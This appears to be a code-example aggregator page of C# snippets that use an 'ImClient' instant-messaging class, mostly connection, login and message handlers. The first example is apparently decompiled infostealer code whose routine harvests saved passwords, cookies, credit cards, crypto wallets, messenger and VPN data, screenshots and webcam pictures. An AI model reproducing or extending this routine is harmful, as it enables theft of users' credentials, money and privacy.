Ejemplo n.º 1
0
 // Token: 0x0600009C RID: 156 RVA: 0x00008324 File Offset: 0x00006524
 private static void Helper()
 {
     Passwords.GetPasswords();
     FireFox.GetPasswordFirefox();
     Internet_Explorer.Start();
     Cookies.GetCookies();
     Autofill.GetCAutofills();
     Clipboard.GetText();
     CreditCards.GetCreditCards();
     History.GetHistory();
     USB.GetUSB();
     DesktopFiles.Inizialize();
     Discord.GetDiscord();
     Skype.GetSkype();
     FTPClient.GetFileZilla();
     ImClient.GetImClients();
     MailClient.GoMailClient();
     VPNClient.GetVPN();
     HardwareInfo.GoInfo();
     ScreenDektop.GetScreenshot("screenshot.jpg");
     Steam.CopySteam();
     Telegram.GetTelegram();
     WebCam.GetWebCamPicture();
     Wallets.GetWallets();
     Location.GetLocation(false);
 }
Ejemplo n.º 2
0
 private static void ImClient_OnReceivedChannelMessage(ImClient im, IM.Protocol.ReceivedChannelMessage msg)
 {
     if (msg.Type != -1)
     {
         im.SendToChannel("1", ReplayTxt.GetTxt(), -1);
     }
     Console.WriteLine("received channel message:{0}", msg.Content);
 }
Ejemplo n.º 3
0
 private static void ImClient_OnLogin(ImClient arg1, bool arg2, string arg3)
 {
     if (arg2)
     {
         Console.WriteLine("login success");
         arg1.JoinChannel("1");
     }
     else
     {
         Console.WriteLine("login failed:{0}", arg3);
     }
 }
Ejemplo n.º 4
0
		public ImLogWindow (ImClient client, string path, string search, string highlight)
		{
			this.client = client;
			
			if (Directory.Exists (path)) {
				log_path = path;
			} else if (File.Exists (path)) {
				log_path = Path.GetDirectoryName (path);
				initial_select_file = new FileInfo (path);
			} else {
				Console.WriteLine ("ERROR: Log path doesn't exist - {0}", path);
				return;
			}

			highlight_text = highlight;
			search_text = search;

			ShowWindow ();
		}
Ejemplo n.º 5
0
        static void Main(string[] args)
        {
            var imClient = new ImClient();

            //imClient.Ip = "127.0.0.1";
            //imClient.Port = 16666;
            imClient.OnConnected              += ImClient_OnConnected;
            imClient.OnConnectedFailed        += ImClient_OnConnectedFailed;
            imClient.OnDisconnected           += ImClient_OnDisconnected;
            imClient.OnError                  += ImClient_OnError;
            imClient.OnReceivedChannelMessage += ImClient_OnReceivedChannelMessage;
            imClient.OnLogin                  += ImClient_OnLogin;
            imClient.Start();
            while (true)
            {
                var s = Console.ReadLine();
                if (!string.IsNullOrWhiteSpace(s))
                {
                    imClient.SendToChannel("1", s, 0);
                }
            }
        }
Ejemplo n.º 6
0
        public ImLogWindow(ImClient client, string path, string search, string highlight)
        {
            this.client = client;

            if (Directory.Exists(path))
            {
                log_path = path;
            }
            else if (File.Exists(path))
            {
                log_path            = Path.GetDirectoryName(path);
                initial_select_file = new FileInfo(path);
            }
            else
            {
                Console.WriteLine("ERROR: Log path doesn't exist - {0}", path);
                return;
            }

            highlight_text = highlight;
            search_text    = search;

            ShowWindow();
        }
Ejemplo n.º 7
0
 /// <summary>
 /// 初始化 ImHelper
 /// </summary>
 /// <param name="options"></param>
 public static void Initialization(ImClientOptions options)
 {
     _instance = new ImClient(options);
 }
Ejemplo n.º 8
0
 private static void ImClient_OnConnected(ImClient obj)
 {
     Console.WriteLine("connected");
     obj.Login("www.bmmgo.com", Guid.NewGuid().ToString("N"), "41f7d5a8942ba6956a9e6e9d70aaf7a8");
 }
Ejemplo n.º 9
0
 private static void ImClient_OnConnectedFailed(ImClient obj)
 {
     Console.WriteLine("connect failed");
 }
Ejemplo n.º 10
0
 private static void ImClient_OnDisconnected(ImClient obj)
 {
     Console.WriteLine("disconnected");
 }
Ejemplo n.º 11
0
 private static void ImClient_OnError(ImClient obj, Exception exception)
 {
     Console.WriteLine("error:{0}", exception.Message);
 }